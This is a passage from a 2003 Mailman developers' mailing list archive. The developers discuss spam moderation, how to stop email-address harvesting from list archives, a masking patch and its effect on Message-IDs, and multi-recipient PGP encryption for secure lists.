thats what the to-be-moderated queue is called). Being flaged as spam would be another way to enter that queue. How it gets out (or not...) is up to admindb, not to either the current SA 'Handlers', or my proposed Handler+Configurator. Unless I wanted to hack up that subsystem so that the choices a moderator had were based on how the message got there, I guess its just a matter of having another canned error message. Its not much of a difference either way as far as code goes. As for actual help, I think Im well on my way. Some of the options remain up to the site admin (spamd/headers, regexp), but on/off, the scores (reject, to-queue, member bonus) are now per-list configurable. Ive got to move it from my workstation over to a system that is (a bit more) 'live', and now add that other canned message.. But that might already be in the Handler... If I can figgure out how to get 'diff' to give me the new files and not just tell me about them, I could have a patchset up within a day. On Thu, 2003-11-27 at 04:47, PieterB wrote: > Integrating moderation of spam messages that are holded in 'admindb'. > > Jeff wrote: > > Likely it would be hard coded at 3 possible actions > > discard, hold for moderation, or pass through, as I cant think that > > anyone would want to bounce spam. > > I don't understand this. There are currently four options in 'admindb' > moderation: defer/approve/reject/discard. It might the best to have > a fifth option if spam assassin integration is enabled on the list: > "discard spam". That would make it possible to integrate spam bayes > learning or spam reporting on those messages (i can imaging that > bouncing spam to a spamtrap is usefull in some setups as well). On > the other hand it might be confusing for moderators to have two > 'discard' options, and I doubt if many non-spam messages are discarded > by moderators. Thoughts? > > I'm willing to help you with the SA-integration. I didn't hear > Barry's opinion on integrating SpamAssassin and mailman. From chuqui at plaidworks.com Thu Nov 27 14:09:07 2003 From: chuqui at plaidworks.com (Chuq Von Rospach) Date: Thu Nov 27 14:09:27 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <1069957704.8426.52.camel@anthem> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC3B653.9060608@gmx.at> <1069957704.8426.52.camel@anthem> Message-ID: <2CA4A40C-210D-11D8-A9D7-0003934516A8@plaidworks.com> It's not a security issue. It's a privacy issue. Very different beasts. Very important beasts, but the only thing they have in common is the number of legs they have. The underlying issue is similar to many bugtraq issues: what used to be a common, acceptable coding practice no longer is. But man, things like "security issue" are rapidly becoming an aspect of Godwin's law: phrases that are overused and used improperly, and mostly indicating the end of useful dicussion and the entrance into the world of political and emotional rhetoric. On Nov 27, 2003, at 10:28 AM, Barry Warsaw wrote: > Just to be snitty and pedantic, I don't consider email address leaks in > Pipermail to be security flaws. From chuqui at plaidworks.com Thu Nov 27 14:17:34 2003 From: chuqui at plaidworks.com (Chuq Von Rospach) Date: Thu Nov 27 14:18:39 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <20031127175214.GB705@ostraya.zone12.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <96CA2A64-20FD-11D8-A9D7-0003934516A8@plaidworks.com> <20031127175214.GB705@ostraya.zone12.com> Message-ID: <5ADE29EC-210E-11D8-A9D7-0003934516A8@plaidworks.com> On Nov 27, 2003, at 9:52 AM, Terri Oda wrote: > Of course. We should remember that *that's* the reason not to do > turing > tests. > It's a great example of people solving problems before they actually define them, and throwing resources at symptoms, not really solving what's at root cause. Now sometimes you have no alternative than a continuing arms race of escalation, like in the current spam/anti-spam wars. But it's always useful to sit back and see if you can figure out what the real problem is and whether you can circumvent it at a basic level and not just run around patching the latest version of it. And it's also important to not over-fix a problem. After all, there's still nothing stopping spammers from simply subscribing to mailing lists and harvesting addresses from postings directly, other than it's simply easier and more anonymous to grab archives. So don't waste time OVER-securing the archives, since that just leads to a false sense of security anyway. If you really want to secure this, you'll have to tear down mailman to square one, and re-engineer it to obscure mail addresses on all traffic, and replace them with mapped addresses that forward through the server. that means all 1to1 traffic (replies, etc) also need to travel through the server, and effectively, Mailman starts becoming an anonymous remailer type of beast as well as a mail server. Which creates a whole new class of problems while solving this one... (and yes, that's actually a design paradigm I'm noodling on, in what little time I have to noodle right now.) From chuqui at plaidworks.com Thu Nov 27 14:19:05 2003 From: chuqui at plaidworks.com (Chuq Von Rospach) Date: Thu Nov 27 14:19:39 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <1069957929.8426.57.camel@anthem> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC3B653.9060608@gmx.at> <7A7514A4-1F91-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC48227.5030503@gmx.at> <1069957929.8426.57.camel@anthem> Message-ID: <910DFDC1-210E-11D8-A9D7-0003934516A8@plaidworks.com> On Nov 27, 2003, at 10:32 AM, Barry Warsaw wrote: > We don't need to get into lengthy language wars here, but I submit that > there's no practical difference in performance between Python and Perl, > especially in the problem domain that Mailman addresses. Sorry, given that Mailman is almost always rate limited by I/O and the MTA, it's mostly irrelevant to talk about performance. Mailman is almost NEVER the bottleneck when you use 2.1. So why argue about upgrading a six lane highway to eight lanes when a mile down the road it all turns back into four? From brad.knowles at skynet.be Thu Nov 27 17:07:02 2003 From: brad.knowles at skynet.be (Brad Knowles) Date: Thu Nov 27 17:11:47 2003 Subject: [Mailman-Developers] Secure Mailing Lists In-Reply-To: <1069956750.8426.43.camel@anthem> References: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C1@himalaya.maurer-it.com> <1069956750.8426.43.camel@anthem> Message-ID: At 1:12 PM -0500 2003/11/27, Barry Warsaw wrote: > - Obviously you're going to do personalized deliveries, so for any such > list you'll probably want to disable digests. Actually, you can encrypt the message once, to each of the keys of each of the people on the list. You don't have to do multiple encryptions. That would save a hell of a lot of processing overhead. You could easily handle a digest the same way. -- Brad Knowles, "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -Benjamin Franklin, Historical Review of Pennsylvania. GCS/IT d+(-) s:+(++)>: a C++(+++)$ UMBSHI++++$ P+>++ L+ !E-(---) W+++(--) N+ !w--- O- M++ V PS++(+++) PE- Y+(++) PGP>+++ t+(+++) 5++(+++) X++(+++) R+(+++) tv+(+++) b+(++++) DI+(++++) D+(++) G+(++++) e++>++++ h--- r---(+++)* z(+++) From colinp at waikato.ac.nz Thu Nov 27 17:26:46 2003 From: colinp at waikato.ac.nz (Colin Palmer) Date: Thu Nov 27 17:26:50 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <20031127170823.GA705@ostraya.zone12.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> Message-ID: <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> On Fri, 2003-11-28 at 06:08, Terri Oda wrote: > So, is anyone working on this *within* pipermail? I know there are great > alternative archivers out there, but Mailman still winds up with a bad > reputation if the default isn't very secure. Maybe for 2.2 we could have a > "completely obscure archived email addresses" option which changed them all > to user@xxxxxx. On the copy of Mailman I run here, I just went though Mailman/Archiver/HyperArch.py and replaced all the occurances of re.sub('@', _(' at ') with re.sub(r'([\w\.-]+@.)[\w\.-]+', r'\1...' which achieves a similar effect with ARCHIVER_OBSCURES_EMAILADDRS turned on. (then you just need to add an ACL to the webserver to stop someone downloading the listname.mbox file that has all the unmunged addresses still in it) -- Colin Palmer University of Waikato, ITS Division From chuqui at plaidworks.com Thu Nov 27 21:31:17 2003 From: chuqui at plaidworks.com (Chuq Von Rospach) Date: Thu Nov 27 21:32:27 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> Message-ID: On Nov 27, 2003, at 2:26 PM, Colin Palmer wrote: > re.sub('@', _(' at ') with re.sub(r'([\w\.-]+@.)[\w\.-]+', r'\1...' > which achieves a similar effect with ARCHIVER_OBSCURES_EMAILADDRS > turned > on. > which is a no-op, since spambot's learned how to de-obfuscate that stuff years ago. False sense of security. All it really does is make it more difficult for people reading it, not the computers harvesting it. From barry at python.org Thu Nov 27 23:03:53 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 23:04:01 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <910DFDC1-210E-11D8-A9D7-0003934516A8@plaidworks.com> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <20276EA2-1F78-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC3B653.9060608@gmx.at> <7A7514A4-1F91-11D8-8CA9-000A957C9A50@openinfo.co.uk> <3FC48227.5030503@gmx.at> <1069957929.8426.57.camel@anthem> <910DFDC1-210E-11D8-A9D7-0003934516A8@plaidworks.com> Message-ID: <1069992232.19968.6.camel@anthem> On Thu, 2003-11-27 at 14:19, Chuq Von Rospach wrote: > On Nov 27, 2003, at 10:32 AM, Barry Warsaw wrote: > > > We don't need to get into lengthy language wars here, but I submit that > > there's no practical difference in performance between Python and Perl, > > especially in the problem domain that Mailman addresses. > > Sorry, given that Mailman is almost always rate limited by I/O and the > MTA, it's mostly irrelevant to talk about performance. Mailman is > almost NEVER the bottleneck when you use 2.1. So why argue about > upgrading a six lane highway to eight lanes when a mile down the road > it all turns back into four? Exactly. -Barry From barry at python.org Thu Nov 27 23:05:16 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 23:05:22 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> Message-ID: <1069992315.19968.8.camel@anthem> On Fri, 2003-11-28 at 06:26, Colin Palmer wrote: > (then you just need to add an ACL to the webserver to stop someone > downloading the listname.mbox file that has all the unmunged addresses > still in it) I'd consider turning this off for 2.1.4 if people agree. Perhaps making it available only through a site config var. I'm not sure how easy that is, but it seems important enough to close off access to the mbox file. Opinions? -Barry From barry at python.org Thu Nov 27 23:06:16 2003 From: barry at python.org (Barry Warsaw) Date: Thu Nov 27 23:06:22 2003 Subject: [Mailman-Developers] Secure Mailing Lists In-Reply-To: References: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C1@himalaya.maurer-it.com> <1069956750.8426.43.camel@anthem> Message-ID: <1069992375.19968.10.camel@anthem> On Thu, 2003-11-27 at 17:07, Brad Knowles wrote: > At 1:12 PM -0500 2003/11/27, Barry Warsaw wrote: > > > - Obviously you're going to do personalized deliveries, so for any such > > list you'll probably want to disable digests. > > Actually, you can encrypt the message once, to each of the keys > of each of the people on the list. You don't have to do multiple > encryptions. That would save a hell of a lot of processing overhead. > > You could easily handle a digest the same way. Good point! -Barry From philb at philb.us Thu Nov 27 23:25:28 2003 From: philb at philb.us (Phil Barnett) Date: Thu Nov 27 23:25:34 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <1069992315.19968.8.camel@anthem> References: <3FB78C1A.5080702@gmx.at> <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> <1069992315.19968.8.camel@anthem> Message-ID: <200311272325.28941.philb@philb.us> On Thursday 27 November 2003 11:05 pm, Barry Warsaw wrote: > On Fri, 2003-11-28 at 06:26, Colin Palmer wrote: > > (then you just need to add an ACL to the webserver to stop someone > > downloading the listname.mbox file that has all the unmunged addresses > > still in it) > > I'd consider turning this off for 2.1.4 if people agree. Perhaps making > it available only through a site config var. I'm not sure how easy that > is, but it seems important enough to close off access to the mbox file. I'd prefer it gone. If someone needs it badly enough and they can convince me, I can make it available by some other method. -- "The true measure of a man is how he treats someone who can do him absolutely no good." - Samuel Johnson (1709-1784) ? From dietmar at maurer-it.com Fri Nov 28 03:53:22 2003 From: dietmar at maurer-it.com (Dietmar Maurer) Date: Fri Nov 28 03:53:27 2003 Subject: AW: [Mailman-Developers] Secure Mailing Lists Message-ID: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C3@himalaya.maurer-it.com> >On Thu, 2003-11-27 at 17:07, Brad Knowles wrote: >> At 1:12 PM -0500 2003/11/27, Barry Warsaw wrote: >> >> > - Obviously you're going to do personalized deliveries, >so for any such >> > list you'll probably want to disable digests. >> >> Actually, you can encrypt the message once, to each of the keys >> of each of the people on the list. You don't have to do multiple >> encryptions. That would save a hell of a lot of processing overhead. >> >> You could easily handle a digest the same way. Sorry, I dont underdstand that suggestion. You want to put several encrypted messages into one mail? (I dont know much about public key systems). That would increase the size of the message? Or is it possible to encrypt a message once so that several people can decrypt it? - Dietmar From brad.knowles at skynet.be Fri Nov 28 04:21:01 2003 From: brad.knowles at skynet.be (Brad Knowles) Date: Fri Nov 28 04:28:01 2003 Subject: AW: [Mailman-Developers] Secure Mailing Lists In-Reply-To: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C3@himalaya.maurer-it.com> References: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C3@himalaya.maurer-it.com> Message-ID: At 9:53 AM +0100 2003/11/28, Dietmar Maurer wrote: > Sorry, I dont underdstand that suggestion. You want to put several > encrypted messages into one mail? No. > (I dont know much about public key > systems). That would increase the size of the message? Or is it possible > to encrypt a message once so that several people can decrypt it? Your latter question gets to the point. You encrypt the message once with the session symmetric key, and then you encrypt the session symmetric key once for each recipient public key. Each recipient uses their private key to decrypt the session symmetric key, which is then used to decrypt the message. Fortunately, PGP makes all this transparent to the recipients. The resulting message is somewhat larger, because you've encrypted the session symmetric key for each recipient public key, but this is usually a relatively small expansion and since PGP has built-in compression, this is not usually too much of a loss. If you had a large number of recipients, this might become more of an issue. In that case, you might want to do this function in smaller batches. The only disadvantage with this approach is that you can see what keyids that a message is encrypted for, and this allows someone to do traffic analysis (see who is talking to whom). If this was an issue of concern, then this is something that should be configurable on a per-list basis. -- Brad Knowles, "They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety." -Benjamin Franklin, Historical Review of Pennsylvania. GCS/IT d+(-) s:+(++)>: a C++(+++)$ UMBSHI++++$ P+>++ L+ !E-(---) W+++(--) N+ !w--- O- M++ V PS++(+++) PE- Y+(++) PGP>+++ t+(+++) 5++(+++) X++(+++) R+(+++) tv+(+++) b+(++++) DI+(++++) D+(++) G+(++++) e++>++++ h--- r---(+++)* z(+++) From simone.piunno at wseurope.com Fri Nov 28 04:31:54 2003 From: simone.piunno at wseurope.com (Simone Piunno) Date: Fri Nov 28 04:32:02 2003 Subject: AW: [Mailman-Developers] Secure Mailing Lists In-Reply-To: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C3@himalaya.maurer-it.com> References: <87844F3B84E88E4EA0CD476EA3B9F71D24D5C3@himalaya.maurer-it.com> Message-ID: <200311281031.54276.simone.piunno@wseurope.com> Alle 09:53, venerd? 28 novembre 2003, Dietmar Maurer ha scritto: > >> Actually, you can encrypt the message once, to each of the keys > >> of each of the people on the list. You don't have to do multiple > >> encryptions. That would save a hell of a lot of processing overhead. > Sorry, I dont underdstand that suggestion. You want to put several > encrypted messages into one mail? (I dont know much about public key > systems). That would increase the size of the message? Or is it possible > to encrypt a message once so that several people can decrypt it? Basically, public key encryption works like this: 0. you compress the original plaintext file (e.g. gzip), to reduce redundancy 1. you choose a random key, tipically in the range 128->256 bits 2. you encrypt the compressed plaintext file with this key, using a traditional simmetric algorithm, (e.g. 3DES) 3. for each receiver you encrypt *that random key* with the receiver's public key, using a public key algorithm, (e.g. RSA) 4. you pack everything and send the bundle to all receivers So the encrypted email size is roughly made up of: sizeof(compressed_plaintext) + N*[sizeof(random_key) + sizeof(receiver_id)] Where N is the number of receivers. So OK, the size grows with the number of receivers, but not that much. Moreover, for N < M the encrypted email is smaller that the original plaintext (due to compression). M depends on achieved compression ratio. -- Simone Piunno, chief architect Wireless Solutions SPA - DADA group Europe HQ, via Castiglione 25 Bologna web:www.wseurope.com tel:+390512966811 fax:+390512966800 God is real, unless declared integer From dietmar at maurer-it.com Fri Nov 28 07:02:33 2003 From: dietmar at maurer-it.com (Dietmar Maurer) Date: Fri Nov 28 07:02:39 2003 Subject: AW: [Mailman-Developers] Secure Mailing Lists Message-ID: <87844F3B84E88E4EA0CD476EA3B9F71D24D5CD@himalaya.maurer-it.com> >> >> Actually, you can encrypt the message once, to each of the keys >> >> of each of the people on the list. You don't have to do multiple >> >> encryptions. That would save a hell of a lot of >processing overhead. Another problem I see is that PGP/MIME format. If I implement such secure lists I need to decode mails in that format. Is that staright forward or a complex task? Are there tools/libraries available? - Dietmar From r.barrett at openinfo.co.uk Fri Nov 28 11:32:09 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Fri Nov 28 11:32:23 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit Message-ID: <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> Prompted by this thread and taking on board some of the ideas expressed in the discussion I have posted the following patch for MM 2.1.3 on sourceforge: [ 850805 ] Aggressive anti email address harvesting measure https://sourceforge.net/tracker/? func=detail&aid=850805&group_id=103&atid=300103 Basics of the patch are: For those with deep concerns about email address harvesting this patch offers a more aggressive masking of email addresses in Mailman mail archive files. The patch modifes two files in the standard Mailman distribution: Mailman/Defaults.py and Mailman/Cgi/private.py and can be applied using the following command from within the Mailman build directory: path -p1 < path-to-patch-file It would be fairly trivial to make enabling this feature per-list configurable rather than it being a site admin decision and I will enhance this patch for that purpose if people show an interest in it being done. The following notes about the patch can be found in Defaults.py. Rather idiosyncratically most of the operational elements of this patch are in that file. My reasoning behind this decision is that if people want to fool with the regexes that are at the heart of this patch they can see what will be affected by the changes more readily if the related bits are in the same place. ##### # Anti-spam email address harvesting prevention measures. # # These measures are to limit the ability of spam generators to acquire # email address from archived material in Mailman's list archives. # Implementation is via a dynamic search and replace for email # addresses, appearing in files of MIME type text/html or text/plain, as # those files are requested. The underlying archive file content as # generated by the archiving software remains unchanged. # # The implementation requires that archive files are all delivered by a # modified private.py CGI script which only requires user authentication # if the list whose archive material is being requested is set up as a private # list. In order to get public archives served by private.py a RewriteRule # like this: # # RewriteRule ^/pipermail/(.*) /mailman/private/$1 [PT] # # needs to be used in the Apache httpd.conf to transparently redirect # public archive file requests. # # When email addresses are found, the domain part of the addressed is replaced # with a string of 'x' characters. If the local part of the address appears to # have been VERP'ed then the VERP information is similarly obscured. This is # a fairly brutal set of irreversible modifications to any email addresses in # the returned text and will break any mailto: links in the text. # # Th eamil address regex looks for either an '@' character or its HTML escaped # version '%40' as the local-part/domain separator. You should set # ARCHIVER_OBSCURES_EMAILADDRS = 0 and run bin/arch to rebuild existing archives # to prevent that feature interfering with the operation of these harvesting # prevention measures. # # If you decide to change the regexes then copy all of this stuff into # mm_cfg.py and make the changes there. # ##### Any thoughts or comments, let me know. ----------------------------------------------------------------------- Richard Barrett http://www.openinfo.co.uk From pioppo at ferrara.linux.it Fri Nov 28 15:06:43 2003 From: pioppo at ferrara.linux.it (Simone Piunno) Date: Fri Nov 28 14:46:07 2003 Subject: AW: [Mailman-Developers] Secure Mailing Lists In-Reply-To: <87844F3B84E88E4EA0CD476EA3B9F71D24D5CD@himalaya.maurer-it.com> References: <87844F3B84E88E4EA0CD476EA3B9F71D24D5CD@himalaya.maurer-it.com> Message-ID: <200311282106.43348.pioppo@ferrara.linux.it> On Friday 28 November 2003 13:02, Dietmar Maurer wrote: > Another problem I see is that PGP/MIME format. If I implement such > secure lists I need to decode mails in that format. You probably need also to *send* mails in that format! That's the format recommended by RFC2440, so at least you should make it a per-user option. > Is that staright > forward or a complex task? it's easier to decode PGP/MIME than to scan the body for lines that appear to be PGP headers. You just have to check the MIME-type: Content-Type: multipart/encrypted; protocol="application/pgp-encrypted"; inside this you'll have an application/pgp-encrypted part > Are there tools/libraries available? Mailman's Scrubber.py is enough ;) -- Adde parvum parvo magnus acervus erit -- Ovidio From claw at kanga.nu Fri Nov 28 19:48:59 2003 From: claw at kanga.nu (J C Lawrence) Date: Fri Nov 28 19:49:03 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: Message from Richard Barrett of "Fri, 28 Nov 2003 16:32:09 GMT." <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> References: <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> Message-ID: <17629.1070066939@kanga.nu> On Fri, 28 Nov 2003 16:32:09 +0000 Richard Barrett wrote: > Prompted by this thread and taking on board some of the ideas > expressed in the discussion I have posted the following patch for MM > 2.1.3 on sourceforge: > [ 850805 ] Aggressive anti email address harvesting measure This patch appears to fail to distinguish between email addresses and Message IDs. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From dgc at uchicago.edu Fri Nov 28 20:39:22 2003 From: dgc at uchicago.edu (David Champion) Date: Fri Nov 28 20:39:48 2003 Subject: [Mailman-Developers] Re: bugtraq submission warning: email address harvesting exploit In-Reply-To: <1069992315.19968.8.camel@anthem> References: <3FB78C1A.5080702@gmx.at> <20031121003627.GJ9121@dust.uchicago.edu> <3FC39580.2020605@gmx.at> <1069783232.1069.21.camel@geddy> <3FC3A001.5020006@gmx.at> <1069787024.1069.25.camel@geddy> <20031127170823.GA705@ostraya.zone12.com> <1069972005.9770.99.camel@firefox.cc.waikato.ac.nz> <1069992315.19968.8.camel@anthem> Message-ID: <20031129013921.GA9121@dust.uchicago.edu> * On 2003.11.27, in <1069992315.19968.8.camel@anthem>, * "Barry Warsaw" wrote: > > downloading the listname.mbox file that has all the unmunged addresses > > still in it) > > I'd consider turning this off for 2.1.4 if people agree. Perhaps making > it available only through a site config var. I'm not sure how easy that > is, but it seems important enough to close off access to the mbox file. I *really* value this ability, but I understand the arguments for not making it downloadable. How hard would it be to avail it to subscribers, but to restrict it to anonymous accessors? And would that be sufficient for most people? And while on the topic, I'd like to see munging in the anonymous filter and original text in the authenticated filter, too, as someone else has described. -- -D. dgc@uchicago.edu University of Chicago > NSIT > VDN > ENSS > ENSA > You are here . . . . . . . always line up dots From r.barrett at openinfo.co.uk Sat Nov 29 02:12:45 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Sat Nov 29 02:13:08 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <17629.1070066939@kanga.nu> References: <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> <17629.1070066939@kanga.nu> Message-ID: <6E17C24A-223B-11D8-89F4-000A957C9A50@openinfo.co.uk> On 29 Nov 2003, at 00:48, J C Lawrence wrote: > On Fri, 28 Nov 2003 16:32:09 +0000 > Richard Barrett wrote: > >> Prompted by this thread and taking on board some of the ideas >> expressed in the discussion I have posted the following patch for MM >> 2.1.3 on sourceforge: > >> [ 850805 ] Aggressive anti email address harvesting measure > > This patch appears to fail to distinguish between email addresses and > Message IDs. > And ... In the interest of simplicity it doesn't attempt to. But how important a matter is that? This is a rendering filter which leaves the underlying archived material intact in the archive and handles both the archive's html pages and the downloadable text version of the period archives. It has no impact on any processing undertaken at the server end on the archive material, which might depend on the Message IDs, thread identification by the archiver for instance. My mail reader will still identify threads in filtered, downloaded text archives when treated as an .mbox, although I grant that the chances of Message ID collisions must be increased by the filtering. > -- > J C Lawrence > ---------(*) Satan, oscillate my metallic sonatas. > claw@kanga.nu He lived as a devil, eh? > http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. > > ----------------------------------------------------------------------- Richard Barrett http://www.openinfo.co.uk From claw at kanga.nu Sat Nov 29 08:32:17 2003 From: claw at kanga.nu (J C Lawrence) Date: Sat Nov 29 08:32:22 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: Message from Richard Barrett of "Sat, 29 Nov 2003 07:12:45 GMT." <6E17C24A-223B-11D8-89F4-000A957C9A50@openinfo.co.uk> References: <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> <17629.1070066939@kanga.nu> <6E17C24A-223B-11D8-89F4-000A957C9A50@openinfo.co.uk> Message-ID: <5060.1070112737@kanga.nu> On Sat, 29 Nov 2003 07:12:45 +0000 Richard Barrett wrote: > On 29 Nov 2003, at 00:48, J C Lawrence wrote: >>> [ 850805 ] Aggressive anti email address harvesting measure >> This patch appears to fail to distinguish between email addresses and >> Message IDs. >> > And ... > In the interest of simplicity it doesn't attempt to. But how important > a matter is that? For me, and (possibly) for Mailman v3, critical. I use Message IDs as a primary key for my list archives, indexing and several other bits. Changing them, at any point, breaks that. > This is a rendering filter which leaves the underlying archived > material intact in the archive and handles both the archive's html > pages and the downloadable text version of the period archives. It has > no impact on any processing undertaken at the server end on the > archive material, which might depend on the Message IDs, thread > identification by the archiver for instance. For me Message IDs are both a systems-level and user-level concern. Raw Message IDs as well as URLs containing message IDs are quoted by users as ways to reference specific messages in the archives, additionally Message IDs are also quoted in URLs which appear in every message, which point to that message in the archives, etc. > My mail reader will still identify threads in filtered, downloaded > text archives when treated as an .mbox, although I grant that the > chances of Message ID collisions must be increased by the filtering. I and several others use an NNTP-based backing store (which of course uses Message ID as a primary key as per NNTP specs) for my archives and then render directly out of that (see prior traffic on this list wrt MeoWWW etc). The access key for retrieving a message is its Message ID. Touch the Message ID and the whole system breaks. -- J C Lawrence ---------(*) Satan, oscillate my metallic sonatas. claw@kanga.nu He lived as a devil, eh? http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. From r.barrett at openinfo.co.uk Sat Nov 29 09:40:48 2003 From: r.barrett at openinfo.co.uk (Richard Barrett) Date: Sat Nov 29 09:40:56 2003 Subject: [Mailman-Developers] bugtraq submission warning: email address harvesting exploit In-Reply-To: <5060.1070112737@kanga.nu> References: <696145F0-21C0-11D8-8A8B-000A957C9A50@openinfo.co.uk> <17629.1070066939@kanga.nu> <6E17C24A-223B-11D8-89F4-000A957C9A50@openinfo.co.uk> <5060.1070112737@kanga.nu> Message-ID: <059F1F1D-227A-11D8-89F4-000A957C9A50@openinfo.co.uk> On 29 Nov 2003, at 13:32, J C Lawrence wrote: > On Sat, 29 Nov 2003 07:12:45 +0000 > Richard Barrett wrote: >> On 29 Nov 2003, at 00:48, J C Lawrence wrote: > >>>> [ 850805 ] Aggressive anti email address harvesting measure > >>> This patch appears to fail to distinguish between email addresses and >>> Message IDs. >>> > >> And ... > >> In the interest of simplicity it doesn't attempt to. But how important >> a matter is that? > > For me, and (possibly) for Mailman v3, critical. I use Message IDs as > a > primary key for my list archives, indexing and several other bits. > Changing them, at any point, breaks that. > I confess I was not gazing that far into the future and, not being a Mailman developer, have no influence or knowledge of the architecture of Mailman v3. However, offering an immediate fix for an arguably valid criticism of the current stable release that would not have a major destabilizing effect on that stable release seems worthwhile to me. One of the reasons why the offered patch is so limited in its impact on the Mailman source is that it does the job at a single choke point (in private.py), is entirely quiescent if you do not turn it on in mm_cfg.py, returns to do nothing if you turn it back off again and leaves no trace in the data on the server whether it was ever turned on or not or how many times. This means that an alternative solution in a later Mailman release can happily omit this solution and still finds itself updating standard Mailman archives as if the brief period of currency for the solution had never been. It seems from what you say that your archiving and indexing solution is not standard Mailman internal pipermail archiving so the poor fit of the solution offered with your system is unsurprising. >> This is a rendering filter which leaves the underlying archived >> material intact in the archive and handles both the archive's html >> pages and the downloadable text version of the period archives. It has >> no impact on any processing undertaken at the server end on the >> archive material, which might depend on the Message IDs, thread >> identification by the archiver for instance. > > For me Message IDs are both a systems-level and user-level concern. > Raw > Message IDs as well as URLs containing message IDs are quoted by users > as ways to reference specific messages in the archives, additionally > Message IDs are also quoted in URLs which appear in every message, > which > point to that message in the archives, etc. > >> My mail reader will still identify threads in filtered, downloaded >> text archives when treated as an .mbox, although I grant that the >> chances of Message ID collisions must be increased by the filtering. > > I and several others use an NNTP-based backing store (which of course > uses Message ID as a primary key as per NNTP specs) for my archives and > then render directly out of that (see prior traffic on this list wrt > MeoWWW etc). The access key for retrieving a message is its Message > ID. > Touch the Message ID and the whole system breaks. > Bear in mind that the patch only affects the data delivered in response to HTTP requests. The actual archive data on the server remains unchanged and the patch has no effect on data moving in either direction through a regular NNTP-Mailman gateways. If you have your own adaptations to Mailman, of which I know nothing, it is no surprise if the proffered solution is not suitable. As the patch is only intended as a simple, fast solution for standard pipermail archives (or my integration of the MHonArc archiver with pipermail) which deliver material from the archives via Mailman's private.py script, I guess the solution is not for you. Your input was informative and useful and I'll ponder on it. In the meantime, the best of luck in finding an alternative solution that fits your needs. > -- > J C Lawrence > ---------(*) Satan, oscillate my metallic sonatas. > claw@kanga.nu He lived as a devil, eh? > http://www.kanga.nu/~claw/ Evil is a name of a foeman, as I live. > From claw at kanga.nu Sat Nov 29 09:55:38 2003 From: claw at kanga.nu (J C Lawrence) Date: Sat Nov 29 09:55:44 2003 Subject: [Mailman-Developers] bugtraq submission warning: 